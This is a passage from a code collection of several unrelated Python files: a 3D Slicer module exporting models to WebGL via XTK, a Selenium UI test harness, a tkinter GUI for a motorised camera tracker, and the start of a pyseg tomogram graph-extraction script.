# DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR
# ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES
# (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
# LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON
# ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS
# SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
def sanitize_id( id ): return id.strip().replace( " ", "" )
( _ADD, _DELETE, _INSERT ) = range( 3 )
( _ROOT, _DEPTH, _WIDTH ) = range( 3 )
class Node:
def __init__( self, name, identifier=None, expanded=True ):
self.__identifier = ( str( uuid.uuid1() ) if identifier is None else
sanitize_id( str( identifier ) ) )
self.name = name
self.expanded = expanded
self.__bpointer = None
self.__fpointer = []
@property
def identifier( self ):
return self.__identifier
@property
def bpointer( self ):
return self.__bpointer
@bpointer.setter
def bpointer( self, value ):
if value is not None:
self.__bpointer = sanitize_id( value )
@property
def fpointer( self ):
return self.__fpointer
def update_fpointer( self, identifier, mode=_ADD ):
if mode is _ADD:
self.__fpointer.append( sanitize_id( identifier ) )
elif mode is _DELETE:
self.__fpointer.remove( sanitize_id( identifier ) )
elif mode is _INSERT:
self.__fpointer = [sanitize_id( identifier )]
class Tree:
def __init__( self ):
self.nodes = []
def get_index( self, position ):
for index, node in enumerate( self.nodes ):
if node.identifier == position:
break
return index
def create_node( self, name, identifier=None, parent=None ):
node = Node( name, identifier )
self.nodes.append( node )
self.__update_fpointer( parent, node.identifier, _ADD )
node.bpointer = parent
return node
def show( self, position, level=_ROOT ):
queue = self[position].fpointer
if level == _ROOT:
print( "{0} [{1}]".format( self[position].name,
self[position].identifier ) )
else:
print( "\t" * level, "{0} [{1}]".format( self[position].name,
self[position].identifier ) )
if self[position].expanded:
level += 1
for element in queue:
self.show( element, level ) # recursive call
def expand_tree( self, position, mode=_DEPTH ):
# Python generator. Loosly based on an algorithm from 'Essential LISP' by
# John R. Anderson, Albert T. Corbett, and Brian J. Reiser, page 239-241
yield position
queue = self[position].fpointer
while queue:
yield queue[0]
expansion = self[queue[0]].fpointer
if mode is _DEPTH:
queue = expansion + queue[1:] # depth-first
elif mode is _WIDTH:
queue = queue[1:] + expansion # width-first
def is_branch( self, position ):
return self[position].fpointer
def __update_fpointer( self, position, identifier, mode ):
if position is None:
return
else:
self[position].update_fpointer( identifier, mode )
def __update_bpointer( self, position, identifier ):
self[position].bpointer = identifier
def __getitem__( self, key ):
return self.nodes[self.get_index( key )]
def __setitem__( self, key, item ):
self.nodes[self.get_index( key )] = item
def __len__( self ):
return len( self.nodes )
def __contains__( self, identifier ):
return [node.identifier for node in self.nodes
if node.identifier is identifier]
#
# WebGLExport
#
class WebGLExport:
def __init__( self, parent ):
parent.title = "WebGL Export"
parent.categories = ["Work in Progress"]
parent.contributors = ["Daniel Haehn"]
parent.helpText = """
Export the models in the 3D Slicer scene to WebGL. The WebGL visualization is powered by XTK (<a href='http://goXTK.com'>http://goXTK.com</a>).
<br><br>
Currently color, visibility and opacity of individual models are supported.
<br><br>
More information: <a href='http://github.com/xtk/SlicerWebGLExport'>http://github.com/xtk/SlicerWebGLExport</a>
"""
parent.acknowledgementText = """
Flex, dude!
"""
self.parent = parent
#
# qSlicerPythonModuleExampleWidget
#
class WebGLExportWidget:
def __init__( self, parent=None ):
if not parent:
self.parent = slicer.qMRMLWidget()
self.parent.setLayout( qt.QVBoxLayout() )
self.parent.setMRMLScene( slicer.mrmlScene )
else:
self.parent = parent
self.logic = WebGLExportLogic()
self.__httpd = None
self.__port = 3456
self.__p = None
if not parent:
self.setup()
self.parent.show()
def __del__( self ):
# if we have a httpd server running, kill it
if self.__httpd:
self.__p.terminate()
def setup( self ):
# settings
settingsButton = ctk.ctkCollapsibleButton()
settingsButton.text = "Settings"
settingsButton.collapsed = False
self.parent.layout().addWidget( settingsButton )
settingsLayout = qt.QFormLayout( settingsButton )
self.__dirButton = ctk.ctkDirectoryButton()
settingsLayout.addRow( "Output directory:", self.__dirButton )
self.__viewCheckbox = qt.QCheckBox()
self.__viewCheckbox.setChecked( True )
settingsLayout.addRow( "View after export:", self.__viewCheckbox )
# advanced
advancedButton = ctk.ctkCollapsibleButton()
advancedButton.text = "Advanced"
advancedButton.collapsed = True
self.parent.layout().addWidget( advancedButton )
advancedLayout = qt.QFormLayout( advancedButton )
self.__copyCheckbox = qt.QCheckBox()
self.__copyCheckbox.setChecked( True )
advancedLayout.addRow( "Copy models to output directory:", self.__copyCheckbox )
self.__captionCombobox = qt.QComboBox()
self.__captionCombobox.addItems( ['None', 'Model name', 'Hierarchy name'] )
self.__captionCombobox.currentIndex = 1 # Model name by default
advancedLayout.addRow( "Set captions from:", self.__captionCombobox )
self.__serverCheckbox = qt.QCheckBox()
self.__serverCheckbox.setChecked( useWebserver )
if not useWebserver:
self.__serverCheckbox.setEnabled( False )
advancedLayout.addRow( "Run internal web server:", self.__serverCheckbox )
# Apply button
self.__exportButton = qt.QPushButton( "Export to WebGL" )
self.__exportButton.toolTip = "Export to WebGL using XTK."
self.__exportButton.enabled = True
self.parent.layout().addWidget( self.__exportButton )
# Add vertical spacer
self.parent.layout().addStretch( 1 )
# connections
self.__exportButton.connect( 'clicked()', self.onExport )
def onExport( self ):
"""
Export to the filesystem.
"""
self.__exportButton.text = "Working..."
slicer.app.processEvents()
outputDir = os.path.abspath( self.__dirButton.directory )
outputFile = os.path.join( outputDir, 'index.html' )
try:
output = self.logic.export( self.__captionCombobox.currentIndex, self.__copyCheckbox.checked, outputDir )
except Exception as e:
# maybe the scene was not saved?
qt.QMessageBox.warning( None, 'Error', 'Please make sure the scene was saved before attempting to export to WebGL!' )
self.__exportButton.text = "Export to WebGL"
return
if self.__serverCheckbox.checked and useWebserver:
# start server
os.chdir( outputDir )
# if we have already a httpd running, kill it now
# it will likely leave an orphaned process but since we mark it killed,
# slicer will destroy it on exit
if self.__httpd:
self.__p.terminate()
# increase the port
self.__port += 1
# check first if the port is available (since we open it as a new process we can not check later)
portFree = False
while not portFree:
try:
s = socket.socket( socket.AF_INET, socket.SOCK_STREAM )
s.setsockopt( socket.SOL_SOCKET, socket.SO_REUSEADDR, 1 )
s.bind( ( "", self.__port ) )
except socket.error, e:
portFree = False
self.__port += 1
finally:
s.close()
portFree = True
# we need to break out of the pythonQt context here to make multiprocessing work
import sys
sys.stdin = sys.__stdin__
sys.stdout = sys.__stdout__
sys.stderr = sys.__stderr__
self.__handler = SimpleHTTPServer.SimpleHTTPRequestHandler
self.__httpd = SocketServer.TCPServer( ( "", self.__port ), self.__handler )
self.__p = m.Process( target=self.__httpd.serve_forever )
self.__p.start()
url = 'http://localhost:' + str( self.__port ) + '/index.html'
else:
# no server
url = outputFile
with open( outputFile, 'w' ) as f:
f.write( output )
self.__exportButton.text = "Export to WebGL"
if self.__viewCheckbox.checked:
time.sleep( 1 )
webbrowser.open_new_tab( url )
class WebGLExportLogic:
"""
The actual export logic.
"""
def __init__( self ):
self.__tree = None
self.__nodes = {}
# the html header
self.__header = """
<html>
<!-- WebGL Export for 3D Slicer4 powered by XTK -- http://goXTK.com -->
<head>
<title>WebGL Export</title>
<script type="text/javascript" src="http://get.goxtk.com/xtk_release_9.js"></script>
<script type="text/javascript">
var run = function() {
%s
"""
# the html footer
self.__footer = """
%s
};
</script>
</head>
<body style="margin:0px; padding:0px;" onload="run()">
%s
</body>
</html>
"""
def configureXrenderers( self ):
"""
Grab some Slicer environment values like the camera position etc. and configure the X.renderers
"""
init = ' ' * 8 + "r%s = new X.renderer3D();" + '\n' + ' ' * 8 + "r%s.container = 'r%s';\n"+ ' ' * 8 + 'r%s.init();' + '\n'
configuredInit = ''
div = ' ' * 8 + '<div id="r%s" style="background-color: %s; width: %s; height: %s;%s"></div>' + '\n'
configuredDiv = ''
render = ' ' * 8 + '%sr%s.add(scene);' + '\n'
render += ' ' * 8 + 'r%s.camera.position = %s;' + '\n'
render += ' ' * 8 + 'r%s.camera.up = %s;' + '\n'
render += ' ' * 8 + 'r%s.render();%s' + '\n\n'
configuredRender = ''
# check the current layout
renderers = []
if slicer.app.layoutManager().layout == 15:
# dual 3d
renderers.append( 0 )
renderers.append( 1 )
elif slicer.app.layoutManager().layout == 19:
# triple 3d
renderers.append( 0 )
renderers.append( 1 )
renderers.append( 2 )
else:
# always take just the main 3d view
renderers.append( 0 )
threeDViews = slicer.app.layoutManager().threeDViewCount
for r in xrange( threeDViews ):
# grab the current 3d view background color
threeDWidget = slicer.app.layoutManager().threeDWidget( r )
threeDView = threeDWidget.threeDView()
if not threeDView.isVisible():
continue
mrmlViewNode = threeDView.mrmlViewNode()
bgColor = threeDView.backgroundColor.name() + ';'
# grab the current camera position and up vector
cameraNodes = slicer.util.getNodes( 'vtkMRMLCamera*' )
cameraNode = None
for c in cameraNodes.items():
cameraNode = c[1]
if cameraNode.GetActiveTag() == mrmlViewNode.GetID():
# found the cameraNode
break
if not cameraNode:
raise Exception( 'Something went terribly wrong..' )
camera = cameraNode.GetCamera()
cameraPosition = str( list(camera.GetPosition()) )
cameraUp = str( list(camera.GetViewUp()) )
width = '100%'
height = '100%'
float = ''
begin = '';
end = '';
if ( len( renderers ) == 2 ):
# dual 3d
width = '49.35%'
if threeDWidget.x == 0:
# this is the left one
float += 'position:absolute;left:0;bottom:0;'
else:
begin = 'r0.onShowtime = function() {'
end = '}'
float += 'position:absolute;right:0;bottom:0;'
elif ( len( renderers ) == 3 ):
height = '49.25%'
# triple 3d
if r != 0:
# this is the second row
width = '49.35%'
if threeDWidget.x == 0:
# this is the left one
begin = ' ' * 8 + 'r0.onShowtime = function() {'
float += 'position:absolute;left:0;bottom:0;'
else:
end = ' ' * 8 + '};'
float += 'position:absolute;right:0;bottom:0;'
configuredInit += init % ( r, r, r, r )
configuredRender += render % ( begin, r, r, cameraPosition, r, cameraUp, r, end )
configuredDiv += div % ( r, bgColor, width, height, float )
# .. and configure the X.renderer
header = self.__header % ( configuredInit )
footer = self.__footer % ( configuredRender, configuredDiv )
return [header, footer]
def export( self, captionMode, copyFiles, outputDir ):
"""
Run through the mrml scene and create an XTK tree based on vtkMRMLModelHierarchyNodes and vtkMRMLModelNodes
"""
scene = slicer.mrmlScene
nodes = scene.GetNumberOfNodes()
self.__nodes = {}
# 1 for model name, 2 for parent name
self.__captionMode = captionMode
# TRUE if we shall copy the files to the outputDir
self.__copyFiles = copyFiles
self.__outputDir = outputDir
self.__tree = Tree()
self.__tree.create_node( "Scene", "scene" )
for n in xrange( nodes ):
node = scene.GetNthNode( n )
self.parseNode( node )
[header, footer] = self.configureXrenderers()
output = header
output += self.createXtree( "scene" )
output += footer
return output
def parseNode( self, node ):
"""
Parse one mrml node if it is a valid vtkMRMLModelNode or vtkMRMLModelHierarchyNode and add it to our tree
"""
if not node:
return
if ( not node.IsA( 'vtkMRMLModelNode' ) and not node.IsA( 'vtkMRMLModelHierarchyNode' ) ) or ( node.IsA( 'vtkMRMLModelNode' ) and node.GetHideFromEditors() ):
return
if self.__nodes.has_key( node.GetID() ):
return
parent_node = "scene"
parentNode = None
hNode = None
if node.IsA( 'vtkMRMLModelNode' ):
parentNode = slicer.app.applicationLogic().GetModelHierarchyLogic().GetModelHierarchyNode( node.GetID() )
if parentNode:
parentNode = parentNode.GetParentNode()
elif node.IsA( 'vtkMRMLModelHierarchyNode' ):
parentNode = node.GetParentNode()
if parentNode:
if parentNode.GetID() == node.GetID():
return
parent_node = parentNode.GetID()
self.parseNode( parentNode )
if not node.IsA( 'vtkMRMLModelHierarchyNode' ) or not node.GetModelNode():
self.__nodes[node.GetID()] = node.GetName()
self.__tree.create_node( node.GetName(), node.GetID(), parent=parent_node )
def createXtree( self, position, level=_ROOT, parent="" ):
"""
Convert the internal tree to XTK code.
"""
queue = self.__tree[position].fpointer
mrmlId = self.__tree[position].identifier
output = ' ' * 8 + mrmlId + ' = new X.mesh();\n'
if not level == _ROOT:
n = slicer.mrmlScene.GetNodeByID( mrmlId )
if n.IsA( 'vtkMRMLModelNode' ):
# grab some properties
s = n.GetStorageNode()
if not s:
# error
raise Exception( 'Scene not saved!' )
file = s.GetFileName()
if not file:
# error
raise Exception( 'Scene not saved!' )
d = n.GetDisplayNode()
color = str( list(d.GetColor()) )
opacity = str( d.GetOpacity() )
visible = str( bool( d.GetVisibility() ) ).lower()
if self.__copyFiles:
fileName = os.path.split( file )[1]
shutil.copy( file, os.path.join( self.__outputDir, fileName ) )
file = fileName
output += ' ' * 8 + mrmlId + '.file = "' + file + '";\n'
output += ' ' * 8 + mrmlId + '.color = ' + color + ';\n'
output += ' ' * 8 + mrmlId + '.opacity = ' + opacity + ';\n'
output += ' ' * 8 + mrmlId + '.visible = ' + visible + ';\n'
if self.__captionMode == 1:
# From Model Name
output += ' ' * 8 + mrmlId + '.caption = "' + n.GetName() + '";\n'
elif self.__captionMode == 2:
# From Parent
parentNode = slicer.util.getNode( parent )
if parentNode:
output += ' ' * 8 + mrmlId + '.caption = "' + parentNode.GetName() + '";\n'
output += ' ' * 8 + parent + '.children.push(' + mrmlId + ');\n\n'
level += 1
for element in queue:
output += self.createXtree( element, level, mrmlId ) # recursive call
return output
class Slicelet( object ):
"""A slicer slicelet is a module widget that comes up in stand alone mode
implemented as a python class.
This class provides common wrapper functionality used by all slicer modlets.
"""
# TODO: put this in a SliceletLib
# TODO: parse command line args
def __init__( self, widgetClass=None ):
self.parent = qt.QFrame()
self.parent.setLayout( qt.QVBoxLayout() )
# TODO: should have way to pop up python interactor
self.buttons = qt.QFrame()
self.buttons.setLayout( qt.QHBoxLayout() )
self.parent.layout().addWidget( self.buttons )
self.addDataButton = qt.QPushButton( "Add Data" )
self.buttons.layout().addWidget( self.addDataButton )
self.addDataButton.connect( "clicked()", slicer.app.ioManager().openAddDataDialog )
self.loadSceneButton = qt.QPushButton( "Load Scene" )
self.buttons.layout().addWidget( self.loadSceneButton )
self.loadSceneButton.connect( "clicked()", slicer.app.ioManager().openLoadSceneDialog )
if widgetClass:
self.widget = widgetClass( self.parent )
self.widget.setup()
self.parent.show()
class WebGLExportSlicelet( Slicelet ):
""" Creates the interface when module is run as a stand alone gui app.
"""
def __init__( self ):
super( WebGLExportSlicelet, self ).__init__( WebGLExportWidget )
if __name__ == "__main__":
# TODO: need a way to access and parse command line arguments
# TODO: ideally command line args should handle --xml
import sys
print( sys.argv )
slicelet = WebGLExportSlicelet()
|
ui-tests.py
|
from selenium import webdriver
from selenium.common.exceptions import TimeoutException
from webdriver_manager.chrome import ChromeDriverManager
def wait_for(driver, xpath):
from selenium.webdriver.support.ui import WebDriverWait
from selenium.webdriver.support import expected_conditions as EC
from selenium.webdriver.common.by import By
return WebDriverWait(driver, 20).until(EC.presence_of_element_located((By.XPATH, xpath)))
def wait_visible(driver, xpath):
from selenium.webdriver.support.ui import WebDriverWait
from selenium.webdriver.support import expected_conditions as EC
from selenium.webdriver.common.by import By
return WebDriverWait(driver, 20).until(EC.visibility_of_element_located((By.XPATH, xpath)))
def iter_stream_lines(stream, timeout=None):
from threading import Thread
from queue import Queue, Empty
def enqueue_output(out, queue):
for line in out:
queue.put(line)
out.close()
q = Queue()
t = Thread(target=enqueue_output, args=(stream, q))
t.daemon = True # thread dies with the program
t.start()
# read line without blocking
if timeout is None:
get = lambda: q.get_nowait()
else:
get = lambda: q.get(timeout=timeout)
while True:
try: line = get()
except Empty:
yield None
else: # got line
yield line
def run_server():
import subprocess
import sys
ON_POSIX = 'posix' in sys.builtin_module_names
cmd = f"cmd /c bundle exec jekyll serve --port 9875 --host 0.0.0.0"
proc = subprocess.Popen(
cmd,
stdout=subprocess.PIPE,
stderr=subprocess.STDOUT,
bufsize=1,
close_fds=ON_POSIX,
universal_newlines=True,
)
import re
re_addr = re.compile(r"^\s*Server address: (.*)\s*$")
re_running = re.compile(r"\bServer running\b")
running = False
addr = None
for line in iter_stream_lines(proc.stdout, timeout=1):
if line is not None:
sys.stdout.write(line)
match = re_addr.fullmatch(line)
if match is not None:
addr = match[1]
if re_running.search(line) is not None:
running = True
if addr is not None and running == True:
break
addr = addr.replace("0.0.0.0", "localhost")
return addr
def set_viewport_size(driver, width, height):
# ref: https://stackoverflow.com/questions/37181403/how-to-set-browser-viewport-size
window_size = driver.execute_script("""
return [window.outerWidth - window.innerWidth + arguments[0],
window.outerHeight - window.innerHeight + arguments[1]];
""", width, height)
driver.set_window_size(*window_size)
class TestInfo(object):
def __init__(self) -> None:
super().__init__()
self.address = run_server()
self.browser = webdriver.Chrome(
executable_path=ChromeDriverManager().install(),
)
html = ""
with open("ui-test.html", "r") as fp:
html = fp.read()
self.browser.execute_script("""
((html) =>
{
document.open('text/html')
document.write(html)
document.close()
})
.apply(null, arguments)
""", html)
def test_portrait(self):
# ref: https://deviceatlas.com/blog/most-used-smartphone-screen-resolutions
self.browser.maximize_window()
wait_for(self.browser, r'//*[@id="TEST_FRAME"]')
self.browser.execute_script(f"""
(() =>
{{
var iframe = document.getElementById('TEST_FRAME')
iframe.style.width = "{1080/3}px"
iframe.style.height = "{1920/3}px"
iframe.src = "{self.address}"
}})
.apply(null, arguments)
""")
def do_test(self, path):
iframe = wait_for(self.browser, r'//*[@id="TEST_FRAME"]')
self.browser.execute_script(f"""
(() =>
{{
var iframe = document.getElementById('TEST_FRAME')
iframe.src = "{self.address}/{path}"
}})
.apply(null, arguments)
""")
self.browser.switch_to.frame(iframe)
# TODO: do automated tests
self.browser.switch_to.parent_frame()
command = None
while command is None:
try:
command = wait_visible(self.browser, r'//*[@id="COMMAND"]')
except TimeoutException:
pass
value = command.get_attribute("data-value")
self.browser.execute_script(f"""
(() =>
{{
var command = document.getElementById('COMMAND')
command.style.display = "none"
}})
.apply(null, arguments)
""")
return value
def do_tests():
t = TestInfo()
tests = [
{"path": "postgresql/connect-to-database-via-cli", "accepted": False},
{"path": "postgresql/drop-table-if-exists", "accepted": False},
]
for test_item in tests:
while True:
t.test_portrait()
action = t.do_test(test_item["path"])
if action == "ACCEPT":
test_item["accepted"] == True
break
if action == "REJECT":
break
return None
def main():
do_tests()
if __name__ == "__main__":
main()
|
applicationv2.py
|
import tkinter
from tkinter import *
import matplotlib.pyplot as plt
import cvlib as cv
from cvlib.object_detection import draw_bbox
from motorisedcameratracking import *
import threading
import sys
import time
import cv2
from PIL import Image, ImageTk
import webbrowser
import json
def calibrate():
if not x.isRunning():
global saveData#creates the global variables
global saveDataLoaded
#with open("saveFile.json", "r") as saveFile:
# saveData = json.load(saveFile)
#saveDataLoaded=True
waitTime=0.0012#sets the wait time to be used in calibration
speed1,speed2=x.calibrateZero(waitTime,360)#calibrates the motors
saveData['motors']['xMotor']['minWaitTime']=waitTime#assignas the results of calibration to the dictionary
saveData['motors']['yMotor']['minWaitTime']=waitTime
saveData['motors']['xMotor']['maxSpeed']=speed1
saveData['motors']['yMotor']['maxSpeed']=speed2
x.setSpecsZero(waitTime=saveData['motors']['xMotor']['minWaitTime'],speed1=saveData['motors']['xMotor']['maxSpeed'],speed2=None)#sets the specs for the motors to run on
else:
tkinter.messagebox.showinfo("warning","this can not be run while the tracking is active")#warns the user they are already tracking
def importCalibration():
global saveData#tells it to reference the global variables
global saveDataLoaded
with open("saveFile.json", "r") as saveFile:#opens the json file
saveData = json.load(saveFile)#loads the data
saveDataLoaded=True#sets data loaded to true
x.setSpecsZero(waitTime=saveData['motors']['xMotor']['minWaitTime'],speed1=saveData['motors']['xMotor']['maxSpeed'],speed2=saveData['motors']['xMotor']['maxSpeed'])#sets the specs for the motors to run on
def saveCalibration():
if saveDataLoaded:
print(saveData)
with open("saveFile.json", "w") as saveFile:#opens the file
json.dump(saveData, saveFile)#saves the data
else:
tkinter.messagebox.showinfo("warning","There is no calibration data to save")#does not save if there is no data to save
def setCalibration():
pass
def disableAimButtons():
"""disables the buttons when the tracking is active to prevent an error being raised"""
upAdjust.config(state=DISABLED)
downAdjust.config(state=DISABLED)
leftAdjust.config(state=DISABLED)
rightAdjust.config(state=DISABLED)
def activateAimButtons():
"""renables buttons when tracking is stopped"""
upAdjust.config(state=NORMAL)
downAdjust.config(state=NORMAL)
leftAdjust.config(state=NORMAL)
rightAdjust.config(state=NORMAL)
def exit():
"""the method which is run when the exit button is pressed"""
if x.isRunning():#checks if the tracking is active
x.terminate()#stops the tracking
window.destroy()#destroys the window
sys.exit()#ends the program
def imageDisplayA():
while True:#loops as is run in a thread
time.sleep(2)#checks if an image is available every 2 seconds
if x.isImageAvailable():
image=x.getFrameAsImage([1000,500])#gets the image with the boxes pre drawn etc
#b,g,r = cv2.split(image)#coverts the image to the format required by tkinter
#img = cv2.merge((r,g,b))
#img = Image.fromarray(img)
#img = ImageTk.PhotoImage(image=img)
img=convertImageTkinter(image)
imageDisplay.config(image=img)#configures the label to show the image
def startTracking():
if not x.isRunning():#checks the tracking is not already active
popUp=tkinter.Tk()#creates a new window to start the tracking
popUp.title('start Tracking')
popUp.geometry("200x200")
targets=x.getSupportedTargets()
default = tkinter.StringVar(popUp)
default.set(targets[0])#default value
targetSelector = OptionMenu(popUp, default, *targets)#creates a drop down menu to let the user select the target
targetSelector.pack()
def track():
disableAimButtons()#disables the aimimg buttons
x.track(default.get())#starts tracking
imageDisplayThread=threading.Thread(target=imageDisplayA)#starts the thread to display the images
imageDisplayThread.start()
popUp.destroy()#destroys the window
button = tkinter.Button(popUp, text="startTracking", command=track)#adds the button to start tracking
button.pack()
popUp.mainloop()
else:
tkinter.messagebox.showinfo("warning","tracking is already active")#warns the user they are already tracking
def startTrackingLimited():
if not x.isRunning():
popUp=tkinter.Tk()#creates a window to start tracking
popUp.title('start Tracking')
popUp.geometry("300x200")
targets=x.getSupportedTargets()
default = tkinter.StringVar(popUp)
default.set(targets[0]) # default value
targetSelector = OptionMenu(popUp, default, *targets)#creates drop down menu
targetSelector.grid(row=1,column=2)
#creates labels and input boxes
a=Label(popUp,text='first x limit')
b=Label(popUp,text='second x limit')
c=Label(popUp,text='first y limit')
d=Label(popUp,text='second y limit')
a.grid(row=2,column=1)#uses grid to align the items
b.grid(row=3,column=1)
c.grid(row=4,column=1)
d.grid(row=5,column=1)
xl1=tkinter.Entry(popUp)
xl2=tkinter.Entry(popUp)
yl1=tkinter.Entry(popUp)
yl2=tkinter.Entry(popUp)
xl1.grid(row=2,column=2)
xl2.grid(row=3,column=2)
yl1.grid(row=4,column=2)
yl2.grid(row=5,column=2)
warningLabel=tkinter.Label(popUp)
warningLabel.grid(row=6,column=2)
def track():
xLimit1=float(xl1.get())#gets the str from the boxes and converts it to a float
xLimit2=float(xl2.get())
yLimit1=float(yl1.get())
yLimit2=float(yl2.get())
if xLimit1<0 and xLimit2>0 and yLimit1<0 and yLimit2>0:#if limits are in correct format it starts tracking
startTracking(xLimit1,xLimit2,yLimit1,yLimit2)
else:
warningLabel.config(text='please enter correct limits')#warns the user incorrect limits have been used.
def startTracking(xLimit1,xLimit2,yLimit1,yLimit2):#starts tracking with the correct limits
disableAimButtons()
x.trackLimited(default.get(),xLimit1,xLimit2,yLimit1,yLimit2)
imageDisplayThread=threading.Thread(target=imageDisplayA)#stsrts the thread to display the image
imageDisplayThread.start()
popUp.destroy()#destroys the window
button = tkinter.Button(popUp, text="startTracking", command=track)
button.grid(row=7,column=2)
else:
tkinter.messagebox.showinfo("warning","tracking is already active")#warns the user they are already tracking
def stopTracking():
if x.isRunning():#checks if the motor is running
x.terminate()#ends the tracking
activateAimButtons()#reactivates the aiming buttons
else:
tkinter.messagebox.showinfo("warning","nothing to stop")#warns the user there is nothing to stop
def startUp():
importCalibration()#imports the calibration details
def help():
webbrowser.open('https://github.com/wDove1/motorisedcameratracking')#opens the github repository
def showVersionDetails():
pass
saveData=None
saveDataLoaded=False
x=MotorisedCameraTracking(camera={'name': 'RPICam','orientation': 180,'Width':3000,'Height':2000},config={'imagingMode':'intermediate'})#creates an object for the motor tracking
#x.setWarnings(False)
x.setGUIFeatures(True)
startUp()#calls the starup function
window=tkinter.Tk()#creates the main window
window.title('motorisedcameratracking')#titles the window
window.protocol("WM_DELETE_WINDOW", exit)#assigns the exit button to the exit function which also terminates the processes
window.geometry("1920x1080")#sets the size of the window
menuBar=Menu(window)#creates the menu
#assigns drop down menus and buttons to the menu
trackingMenu=Menu(menuBar,tearoff=0)
trackingMenu.add_command(label='startTracking',command=startTracking)
trackingMenu.add_command(label='startTrackingLimited',command=startTrackingLimited)
trackingMenu.add_command(label='stop',command=stopTracking)
helpMenu=Menu(menuBar,tearoff=0)
helpMenu.add_command(label='help',command=help)
calibrationMenu=Menu(menuBar,tearoff=0)
calibrationMenu.add_command(label='motorCalibration',command=calibrate)
calibrationMenu.add_command(label='saveCalibration',command=saveCalibration)
calibrationMenu.add_command(label='importCalibration',command=importCalibration)
#calibrationMenu.add_command(label='setCalibration',command=setCalibration)
menuBar.add_cascade(label='Tracking',menu=trackingMenu)#adds drop down menus to the main menu
menuBar.add_cascade(label='Help',menu=helpMenu)
menuBar.add_cascade(label='Calibration',menu=calibrationMenu)
window.config(menu=menuBar)
upAdjust=tkinter.Button(window,text='Motor Up',command=lambda: x.aim(5,"y"))#creates the aiming buttons
downAdjust=tkinter.Button(window,text='Motor Down',command=lambda: x.aim(-5,"y"))
leftAdjust=tkinter.Button(window,text='Motor Left',command=lambda: x.aim(-5,"x"))
rightAdjust=tkinter.Button(window,text='Motor Right',command=lambda: x.aim(5,"x"))
upAdjust.grid(row = 0, column = 0, pady = 5)#assigns the buttons to the window
downAdjust.grid(row = 1, column = 0, pady = 5)
leftAdjust.grid(row = 2, column = 0, pady = 5)
rightAdjust.grid(row = 3, column = 0, pady = 5)
imageDisplay=tkinter.Label(window,text='no image to display')#creates the label for displaying the iamge
imageDisplay.grid(row=4,column=8,pady=100,padx=100)
window.mainloop()#starts the window
|
dmb_graph_mp.py
|
"""
Script for extracting an analyzing a SynGraphMCF from an oriented pairs of membranes (like a synapse)
Input: - A STAR file with a list of (sub-)tomograms to process:
+ Density map tomogram
+ Segmentation tomogram
- Graph input parameters
Output: - A STAR file with the (sub-)tomograms and their correspoing graphs
(MbGraphMCF object)
- Additional files for visualization
"""
__author__ = 'Antonio Martinez-Sanchez'
# ################ Package import
import time
import sys
import math
import pyseg as ps
import scipy as sp
import os
import numpy as np
import multiprocessing as mp
try:
import pickle as pickle
except:
import pickle
########## Global variables
MB_LBL_1, MB_LBL_2 = 1, 2
EXT_LBL_1, EXT_LBL_2 = 3, 4
GAP_LBL, BG_LBL = 5, 0
########################################################################################
# INPUT PARAMETERS
########################################################################################
####### Input data
ROOT_PATH = '/fs/pool/pool-ruben/antonio/nuc_mito' # Data path
# Input STAR file with segmentations
in_star = ROOT_PATH + '/pre/mbdo_nosplit/dmb_seg_oriented_pre.star'
npr = 1 # number of parallel processes
####### Output data
output_dir = ROOT_PATH + '/graphs/v2'
####### GraphMCF perameter
res = 1.408 # nm/pix
s_sig = 0.75 # 1.5
v_den = 0.0035 # 0.007 # 0.0025 # nm^3
ve_ratio = 2 # 4
max_len = 10 # 15 # 30 # nm
####### Advanced parameters
# nsig = 0.01
csig = 0.01
ang_rot = None
ang_tilt = None
nstd = 5 # 3 # 10
smooth = 3
mb_dst_off = 5 # nm
DILATE_NITER = 2 # pix
do_clahe = False # True
####### Graph density thresholds
v_prop = None # ps.globals.STR_FIELD_VALUE # In None topological simplification
e_prop = ps.globals.STR_FIELD_VALUE # ps.globals.STR_FIELD_VALUE_EQ # ps.globals.STR_VERT_DST
v_mode = None # 'low'
e_mode = 'low'
prop_topo = ps.globals.STR_FIELD_VALUE # ps.globals.STR_FIELD_VALUE_EQ # None is ps.globals.STR_FIELD_VALUE
########################################################################################
# MAIN ROUTINE
########################################################################################
# Print initial message
print('Extracting GraphMCF and NetFilament objects from tomograms')
print('\tAuthor: ' + __author__)
print('\tDate: ' + time.strftime("%c") + '\n')
print('Options:')
# print '\tDisPerSe persistence threshold (nsig): ' + str(nsig)
print('\tSTAR file with the segmentations: ' + str(in_star))
print('\tNumber of parallel processes: ' + str(npr))
print('\tDisPerSe persistence threshold (csig): ' + str(csig))
if ang_rot is not None:
print('Missing wedge edge compensation (rot, tilt): (' + str(ang_rot) + ', ' + str(ang_tilt) + ')')
print('\tSigma for gaussian pre-processing: ' + str(s_sig))
print('\tSigma for contrast enhancement: ' + str(nstd))
print('\tSkeleton smoothing factor: ' + str(smooth))
print('\tData resolution: ' + str(res) + ' nm/pixel')
print('\tMask offset: ' + str(mb_dst_off) + ' nm')
print('\tOutput directory: ' + output_dir)
print('Graph density thresholds:')
if v_prop is None:
print('\tTarget vertex density (membrane) ' + str(v_den) + ' vertex/nm^3 for topological simplification')
else:
print('\tTarget vertex density (membrane) ' + str(
v_den) + ' vertex/nm^3 for property ' + v_prop + ' with mode ' + v_mode)
print('\tTarget edge/vertex ratio (non membrane) ' + str(ve_ratio) + ' for property ' + e_prop + ' with mode ' + e_mode)
if do_clahe:
print('\t-Computing CLAHE.')
print('')
print('Paring input star file...')
star = ps.sub.Star()
star.load(in_star)
in_seg_l = star.get_column_data('_psSegImage')
in_tomo_l = star.get_column_data('_rlnImageName')
star.add_column('_psGhMCFPickle')
### Parallel worker
def pr_worker(pr_id, ids, q_pkls):
pkls_dic = dict()
for row in ids:
input_seg, input_tomo = in_seg_l[row], in_tomo_l[row]
print('\tP[' + str(pr_id) + '] Sub-volume to process found: ' + input_tomo)
